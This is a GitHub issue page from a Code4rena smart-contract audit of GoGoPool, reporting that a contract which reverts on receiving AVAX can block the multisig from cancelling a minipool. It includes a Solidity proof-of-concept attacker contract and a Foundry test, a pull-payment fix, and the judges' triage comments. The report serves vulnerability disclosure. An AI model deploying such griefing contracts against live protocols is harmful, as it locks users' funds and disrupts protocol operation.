Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Multisig can be forcefully prevented from canceling the Minipool. #809

Closed
code423n4 opened this issue Jan 3, 2023 · 6 comments
Closed

Multisig can be forcefully prevented from canceling the Minipool. #809

code423n4 opened this issue Jan 3, 2023 · 6 comments
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working duplicate-623 fix security (sponsor) Security related fix, should be fixed prior to launch satisfactory satisfies C4 submission criteria; eligible for awards sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") sponsor duplicate Sponsor deemed duplicate

Comments

@code423n4
Copy link
Contributor

Lines of code

https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L664

Vulnerability details

Impact

The MinipoolManager._cancelMinipoolAndReturnFunds function implements a push payment mechanism for ETH (AVAX) transfers. This function is internally called by cancelMinipoolByMultisig function.

A malicious contract which reverts on all plain ETH transfer can be used to prevent a multisig from canceling the Minipool. Since the Minipool now cannot move to Canceled state, the only state possible forward for the Minipool is the Launched state or just be in the Prelaunch state forever. Both the scenarios are completed unintentional and unexpected for the MinipoolManager contract.

Proof of Concept

Test case:

contract Malicious {
	receive() external payable { revert("Not Receivable"); }
	function stakeGGP(address staking, ERC20 ggp, uint256 amount) public {
		ggp.approve(staking, amount);
		Staking(staking).stakeGGP(amount);
	}
	function createMinipool(address manager, address nodeID, uint256 avaxAssignmentRequest) public payable {
		MinipoolManager(manager).createMinipool{value: msg.value}(nodeID, 0, 0, avaxAssignmentRequest);
	}
}

contract MinipoolManagerTest is BaseTest {
	address private attacker;
	function setUp() public override {
		super.setUp();
		attacker = getActorWithTokens("attacker", MAX_AMT, MAX_AMT);
	}

	function testBug() public {
		uint256 depositAmt = 1000 ether;
		uint256 avaxAssignmentRequest = 1000 ether;
		uint128 ggpStakeAmt = 200 ether;
		address nodeID = address(1009);

		Malicious maliciousC = new Malicious();

		vm.startPrank(attacker);
		ggp.transfer(address(maliciousC), MAX_AMT);
		maliciousC.stakeGGP(address(staking), ggp, ggpStakeAmt);
		maliciousC.createMinipool{value: depositAmt}(address(minipoolMgr), nodeID, avaxAssignmentRequest);
		vm.stopPrank();

		bytes32 errorCode = "INVALID_NODEID";
		vm.prank(address(rialto));
		vm.expectRevert("ETH_TRANSFER_FAILED");
		minipoolMgr.cancelMinipoolByMultisig(nodeID, errorCode);
	}
}

Tools Used

Manual review

Recommended Mitigation Steps

The MinipoolManager._cancelMinipoolAndReturnFunds should implement a pull payment mechanism in which the recipient itself has to come and trigger the payment transaction.
@code423n4 code423n4 added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working labels Jan 3, 2023
code423n4 added a commit that referenced this issue Jan 3, 2023
@code423n4
AkshaySrivastav issue #809
4619783
@peritoflores
Copy link

#686

C4-Staff added a commit that referenced this issue Jan 6, 2023
@C4-Staff
original risk added for issue #809
aaf94e9
@GalloDaSballo
Copy link

Has coded POC -> Primary

@c4-judge
Copy link
Contributor

GalloDaSballo marked the issue as primary issue

@c4-judge c4-judge added the primary issue Highest quality submission among a set of duplicates label Jan 10, 2023
@c4-judge c4-judge mentioned this issue Jan 10, 2023
Closed
@emersoncloud emersoncloud added the sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") label Jan 15, 2023
@0xju1ie 0xju1ie added the needs-discussion for sponsor to discuss with their team label Jan 18, 2023
@0xju1ie
Copy link

0xju1ie commented Jan 20, 2023

dupe of #623

@0xju1ie 0xju1ie added fix security (sponsor) Security related fix, should be fixed prior to launch sponsor duplicate Sponsor deemed duplicate and removed needs-discussion for sponsor to discuss with their team labels Jan 20, 2023
@c4-judge
Copy link
Contributor

GalloDaSballo marked the issue as duplicate of #623

@c4-judge c4-judge added duplicate-623 and removed primary issue Highest quality submission among a set of duplicates labels Jan 29, 2023
@c4-judge
Copy link
Contributor

c4-judge commented Feb 8, 2023

GalloDaSballo marked the issue as satisfactory

@c4-judge c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Feb 8, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working duplicate-623 fix security (sponsor) Security related fix, should be fixed prior to launch satisfactory satisfies C4 submission criteria; eligible for awards sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") sponsor duplicate Sponsor deemed duplicate
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
6 participants
@GalloDaSballo @emersoncloud @0xju1ie @code423n4 @peritoflores @c4-judge